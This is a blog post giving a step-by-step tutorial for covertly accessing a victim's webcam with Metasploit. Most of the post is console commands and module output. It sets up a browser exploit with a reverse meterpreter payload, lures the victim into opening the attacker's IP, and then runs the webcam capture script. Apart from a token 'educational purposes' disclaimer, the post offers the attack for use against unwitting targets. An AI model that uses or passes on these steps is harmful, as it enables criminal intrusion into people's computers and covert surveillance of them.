How To Hack Web Cam Using MetaSploit 2016

Hello friends today im going to show you how to hack Web Cam using MetaSploit.
To Do this u must have Kali linux or Backtrack 5 installed.

If u cant find metasploit in BT or Kali Download It from HERE

STEPS TO BE FOLLOWED:

Open Metasploit and run following commands:
msf> show exploits
msf>use windows/browser/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > show options
Module options (exploit/windows/browser/adobe_cooltype_sing):
Name Current Setting Required Description
—- —- —- —- —- —- —- —- —- —-
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- —- —- —- —- —- —- —- —- —-
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
—- —-
0 Automatic
msf exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf exploit(adobe_cooltype_sing) > set SRVPORT 80
SRVPORT => 80
msf exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf exploit(adobe_cooltype_sing) >exploit -j
Let the victim open your IP in his/her browser and when it will be opened, you will get 1 meterpreter session.
msf exploit(adobe_cooltype_sing) > session -i 1
meterpreter> run webcam
and you will get the webcam of victim. ðŸ™‚
Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be responsible for any misuse that you do. Hacking webcams is criminal activity and is punishable under cyber crime .

Credits:Sai Kumar Reddy


Thanks for reading my news about How To Hack Web Cam Using MetaSploit 2016 at my blog Mods Firmware if you want too share this article, please put the resource, and if you think this article is very usefully dont forget to bookmark this site with CTRL + D on your keyboard to web browser.

New and Hot Article's :